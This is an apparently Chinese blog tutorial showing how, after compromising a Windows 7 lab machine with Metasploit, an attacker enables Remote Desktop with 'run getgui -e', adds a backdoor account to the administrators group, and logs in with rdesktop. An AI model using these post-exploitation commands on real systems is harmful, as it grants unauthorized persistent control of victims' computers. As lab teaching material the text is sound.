网络安全工程师演示：***是如何进行Windows7计算机***实战？(实战篇)

课前声明：
一、本分享仅作学习交流，请自觉遵照法律法规！
二、搜索：Kali 与编程，学习更多网络***干货！
三、Kali 与编程天天准时更新，敬请学习和关注！
正文部分
1、背景介绍
Metasploit就是一个漏洞框架。它的全称叫作The Metasploit Framework，简称叫作MSF。Metasploit做为全球最受欢迎的工具，不单单是由于它的方便性和强大性，更重要的是它的框架。它容许使用者开发本身的漏洞脚本，从而进行测试。Metasploit(msf)究竟威力如何呢？如何利用***控制受害者主机呢？如何远程开启受害者主机的远程桌面链接服务呢？接下来让咱们一块儿学习！
2、资源装备
1.成功拿下的 Win7虚拟机一台
2.整装待发的小白一个。
3.安装好的Kali Linux虚拟机一台。
3、战略安排
3.1 进入跟已经拿下的Windows7的会话控制界面，以下图所示。

3.2 执行脚本文件，在***者主机远程打开受害者主机的远程桌面服务，以下图所示。
命令：run getgui -e

3.3 在受害者主机查看上条命令的执行结果如何，以下图所示。
步骤：Windows/计算机/系统属性/高级系统设置/远程
以下图可见，成功经过远程命令打开了受害者主机的远程桌面服务。

3.4 查看受害者主机的IP地址，以下图所示。
命令：ipconfig（查看Windows主机的IP地址）
命令：ifconfig（查看linux主机的IP地址）

3.5 利用远程桌面工具链接受害者主机，以下图所示。
命令：rdesktop 受害者主机IP:3389

3.6 以下图所示，进入受害者主机的远程桌面登陆界面，选择其余用户登陆。

3.7 输入刚才建立的帐户信息进行登陆，以下图所示。

3.8 出现的错误信息处理，登陆失败，以下图所示。
Ps：由于刚才建立的帐户信息不属于管理员组，将帐户加入管理员组便可解决该错误，请看下面的操做。

3.9 进入受害者Windows主机的dos界面，以下图所示。
命令：shell

3.10 将刚才新建的帐户加入管理员组，以下图所示。
命令：net localgroup administrators 用户名 /add
例子：net localgroup administrators hacker /add

3.11 改变控制台乱码问题，以下图所示。
命令：chcp 65001

3.12 再次利用远程桌面登陆工具登陆便可（具体命令参见3.5）

3.13 以下图所示，远程链接受害者主机成功！

小编一个个字敲打创做，可辛苦了，问君能否关注一下我呢？你还可搜索:Kali与编程，学习更多******技巧呢 ！拒绝盗版，转载请声明来源：Kali与编程
点我学习更多Kali Linux***测试与网络***实战技巧！